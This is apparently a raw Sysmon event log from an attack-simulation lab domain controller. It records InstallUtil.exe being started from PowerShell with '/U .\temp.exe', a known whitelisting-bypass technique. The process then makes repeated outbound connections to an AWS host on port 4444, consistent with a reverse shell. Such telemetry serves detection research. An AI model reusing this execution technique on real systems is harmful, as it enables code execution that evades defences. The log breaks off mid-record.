Corporationadvapi32.dllMD5=A1EDD29F959E38F8AE4AF9B5CDD2B534,SHA256=CE5ECDC3BEFA2DC8C826A697EAC6CDAC12753258315701130CDEDB19D24DBC75trueMicrosoft WindowsValid 10341000x800000000000000057561213Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-EC34-6172-7AB6-01000000F101}931610168C:\Windows\system32\conhost.exe{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057561212Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=E3B7B5531159A395AC63B7EA256FE7B6,SHA256=B631E93E271E706E0204B606D7851ADF7E65FCA04ACDD73103F0754A9C01007EtrueMicrosoft WindowsValid 734700x800000000000000057561211Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E0C87CF8838DB8C6DBD24A708FCED51B,SHA256=0616E630C7F8E116CE43390638C9CE99209556662C2BBDF5845F1CD03E1C6C4EtrueMicrosoft WindowsValid 734700x800000000000000057561210Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=2582AA6C1F88D34B37B7F82D790D232E,SHA256=AA948BB6583057E2E2F299EBD1717A42D6559CA27AF6BC756D3C3BB4109E4E77trueMicrosoft WindowsValid 734700x800000000000000057561209Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValid 734700x800000000000000057561208Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057561207Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057561206Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E0C87CF8838DB8C6DBD24A708FCED51B,SHA256=0616E630C7F8E116CE43390638C9CE99209556662C2BBDF5845F1CD03E1C6C4EtrueMicrosoft WindowsValid 734700x800000000000000057561205Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057561204Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValid 734700x800000000000000057561203Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValid 734700x800000000000000057561202Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4EA36017E45CC2C5D3D2EABEFBE25941,SHA256=6E96551961497DBE66E0329711E4AC670713DF9315B948D7CB5EEAE8C757292FtrueMicrosoft WindowsValid 734700x800000000000000057561201Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057561200Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=AF862061889F5B9B956E9469DCDAE773,SHA256=AF5CBD35C7D8DEA7D879113FDA61B0F64AC6618BCDAE15C0C732A018BABF68EEtrueMicrosoft CorporationValid 10341000x800000000000000057561199Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-888A-6164-7000-00000000F101}34483736C:\Windows\system32\csrss.exe{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057561198Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.007{8B6011A9-EC34-6172-79B6-01000000F101}86407060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+50f0099(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45734f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+457312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b45b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4573c13(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4573785(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45734f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+457312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b45b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45583d8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+455794a(wow64) 154100x800000000000000057561197Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:33.992{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" /logfile= /LogToConsole=false /U .\temp.exeC:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=AF862061889F5B9B956E9469DCDAE773,SHA256=AF5CBD35C7D8DEA7D879113FDA61B0F64AC6618BCDAE15C0C732A018BABF68EE{8B6011A9-EC34-6172-79B6-01000000F101}8640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 12241200x800000000000000057561319Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:48:40.147{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057561340Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:48:46.194{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057561356Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:48:52.241{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057561386Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:48:58.283{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057561407Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:49:04.330{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057561842Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:49:10.892{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL 734700x800000000000000057561841Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:10.892{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=5E8336C79BE0C2F1080B575E434DD0E4,SHA256=FB7EB70237B5897F875CE8786C26E09F61120DB4A91376A65433EEDCFA634A11trueMicrosoft WindowsValid 734700x800000000000000057561840Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:10.892{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=33E4F8ECEA33AC2AAB8C336A0C11AAA7,SHA256=EE44DEE528EB91D80BB3DE79DBDD7E135A51FD6EF2AF360B6DB8A3CB0C297D1BtrueMicrosoft WindowsValid 734700x800000000000000057561839Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:10.892{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\schannel.dll10.0.14393.4225 (rs1_release.210127-1811)TLS / SSL Security ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationschannel.dllMD5=A9577E37C01F2AC118012CB0F810CB01,SHA256=0BC1D3056283C7579FFCF913B55357EBB0AEB3E8E39E8C053B654228EA224EA9trueMicrosoft WindowsValid 12241200x800000000000000057561833Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:49:10.377{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057561857Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:43.460{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59207-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057561856Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:43.447{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59206-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057561855Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:43.442{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59205-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 12241200x800000000000000057561865Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:49:15.923{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057561878Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:48.480{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59211-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057561877Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:48.478{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59210-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057561876Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:48.475{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59209-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 12241200x800000000000000057561888Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:49:20.937{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057561897Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:53.493{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59215-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057561896Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:53.491{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59214-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057561895Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:53.489{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59213-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 12241200x800000000000000057561910Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:49:25.954{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057561918Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:58.510{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59220-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057561917Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:58.508{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59219-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057561916Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:58.506{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59218-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 534500x800000000000000057561929Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:49:30.970{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe 12241200x800000000000000057562608Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL 734700x800000000000000057562607Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=5E8336C79BE0C2F1080B575E434DD0E4,SHA256=FB7EB70237B5897F875CE8786C26E09F61120DB4A91376A65433EEDCFA634A11trueMicrosoft WindowsValid 734700x800000000000000057562606Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=33E4F8ECEA33AC2AAB8C336A0C11AAA7,SHA256=EE44DEE528EB91D80BB3DE79DBDD7E135A51FD6EF2AF360B6DB8A3CB0C297D1BtrueMicrosoft WindowsValid 734700x800000000000000057562605Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\schannel.dll10.0.14393.4225 (rs1_release.210127-1811)TLS / SSL Security ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationschannel.dllMD5=A9577E37C01F2AC118012CB0F810CB01,SHA256=0BC1D3056283C7579FFCF913B55357EBB0AEB3E8E39E8C053B654228EA224EA9trueMicrosoft WindowsValid 12241200x800000000000000057562604Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache 734700x800000000000000057562603Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=FEC73B133C8A34087EF9E872CD1CD45E,SHA256=4BF805F38A47FAFE9E039DE56DD1B9E36B40561C6D3FD3C75907F35CAA91D9A6trueMicrosoft WindowsValid 13241300x800000000000000057562601Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettingsBinary Data 12241200x800000000000000057562600Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057562599Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 13241300x800000000000000057562598Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet 